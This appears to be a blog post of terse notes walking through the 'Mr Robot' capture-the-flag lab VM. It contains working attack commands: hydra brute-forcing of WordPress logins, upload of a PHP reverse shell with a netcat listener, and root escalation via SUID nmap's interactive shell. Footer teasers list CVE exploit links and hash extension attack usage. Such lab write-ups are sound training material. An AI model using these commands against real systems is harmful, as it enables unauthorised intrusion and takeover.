Skip to main content

VM 4 - MR Robot

VM 4 - MR Robot

============ steps to follow ======================

netdiscover -r 192.168.239.133/24
nmap -sS -AT4 192.168.239.133   /OS and apps
nmap -sS -O -A -n 192.168.239.133
nikto -host 192.168.239.133     / Find apache details
enum4linux 192.168.239.133 / get more details
dirb http://192.168.239.133 / search the web server
192.168.239.133/robots.txt

got a dictionary
wc -l fsociety.dic /Dictionary count 858160 fsocity.dic

cat fsociety.dic | sort -u | wc -l
cat fsocity.dic | sort -u | uniq > newfsocity.dic  / make a unique directory

--------------------------------------------------
bruteforce the wp-login.php using that wordlist  |
--------------------------------------------------
hydra -L newfsocity.dic -p whocares 192.168.239.133 http-form-post "/wp-login.php:log=^USER^&pwd=^PASS^:invalid"

/ -p for password (anything can be given)


wpscan --url http://192.168.239.133/ --wordlist /root/Desktop/Pentest/newfsocity.dic --username  Elliot

password: ER28-0652

Download the shell and upload it to wordpress plugin
http://pentestmonkey.net/tools/web-shells/php-reverse-shell

nc -v -n -l -p 4444 / in terminal

cd /home
c3fcd3d76192e4007dfb496cca67e13b --> md5 hash
abcdefghijklmnopqrstuvwxyz --> decrypted

python -c 'import pty; pty.spawn("/bin/bash")'

su robot
abcdefghijklmnopqrstuvwxyz
cd /home
cd /robot

key-2-of-3.txt -- >822c73956184f694993bede3eb39f959

ls -alh / shows all privilages

find / -name key-3-of-3.txt /find a file; permission denbued''

find / -perm -4000 -type f 2>/dev/null

found: /usr/local/bin/nmap --> this requires root access to work..

nmap --help
nmap --interactive
!sh /get get shell access by typing "!" in nmap interactive session
whoami /root
cd root
ls
key-3-of-3.txt
cat key-3-of-3.txt




Comments

Popular posts from this blog

POC Links for CVE's

  Serach for a CVE here first - Trickest/cve Apache CVE-2024-38475 - CVE-2024-38475 #version less than 2.4.51 CVE-2021-44790 - h ttps://www.exploit-db.com/exploits/51193 #Apache HTTP Server 2.4.50 CVE-2021-42013 - https://www.exploit-db.com/exploits/50406 use https://github.com/mrmtwoj/apache-vulnerability-testing for below CVE's CVE-2024-38472: Apache HTTP Server on Windows UNC SSRF CVE-2024-39573: mod_rewrite proxy handler substitution CVE-2024-38477: Crash resulting in Denial of Service in mod_proxy CVE-2024-38476: Exploitable backend application output causing internal redirects CVE-2024-38475: mod_rewrite weakness with filesystem path matching CVE-2024-38474: Weakness with encoded question marks in backreferences CVE-2024-38473: mod_proxy proxy encoding problem CVE-2023-38709: HTTP response splitting EXIM #suppodily should work for versions below Exim 4.96.1 - is not accurate CVE-2023-42115 - https://github.com/AdaHop-Cyber-Security/Pocy/tree/main

Hash Extension Attacks

  #Install Dependencies sudo apt-get install libssl-dev #Download Hash Extender git clone https://github.com/iagox86/hash_extender.git cd hash_extender make #Run it /hash_extender --data 'username=admin' --secret 16 --append '&isLoggedIn=True' --signature d3a85d3b3087c7e841f84eb4316765c6e1f786074a1f1db996b2e0f8c96f197e2f55433920a630feb07daafadefbc13c947e5225fc509f8241f57f47a8df5311 --format sha512